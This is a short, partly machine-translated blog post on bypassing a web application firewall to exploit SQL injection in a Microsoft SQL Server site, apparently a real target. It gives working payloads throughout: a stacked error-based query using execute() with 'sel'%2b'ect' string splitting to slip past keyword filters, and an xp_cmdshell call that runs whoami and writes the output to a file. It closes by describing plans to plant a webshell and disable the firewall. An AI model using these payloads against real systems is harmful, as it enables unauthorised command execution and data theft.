0x00 Preface
The last bypass was too simple to be able to draw data or get permission, this time continue to bypass, get the data
0x01 process
Or the last site, simple judgment, presence injected
Find and number, exec, union Select, select Number ... Be filtered
found that the Execute function was not filtered and the dog did not show that the function could be used
execute(‘sql语句‘) //execute函数中可以写sql语句,且为字符串,那么就可以传入一些变形字符串来绕过waf
Verify it locally.
Some variants
Just this time using SQL Server stack injection, and will not show the data on the page, so let this time stacking error, to achieve the effect of error injection
execute(‘select convert(int,@@version)‘) --a
Of course it needs to be deformed, otherwise it will be intercepted because a select
execute(‘sel‘%2b‘ect convert(int,@@version)‘) --a //在url编码中 %2b 等价与 + 所以可以理解为 ‘sel‘ + ‘ect‘
By using the Execute function, you can deform to make the WAF impossible to intercept, get the data, or execute the SQL statement, which makes it much easier.
Execute Cmdshell, because Cmdshell cannot be echoed by error, but can redirect the results to a file or write to a table
execute(‘master..xp_cmdshell whoami > e:\‘%2b‘\xx\‘%2b‘\1.txt‘) // 双斜杠被过滤
Returning an error does not matter, WAF does not intercept, see if 1.txt has data
0x02 Follow-up
Would like to write to Webshell or download Webshell through the public network, but the server can not go out of the network, and there is a WAF, resulting in the write shell failure, consider to kill the WAF, but also to avoid the impact on the server.
MSSQL WAF Bypass (2)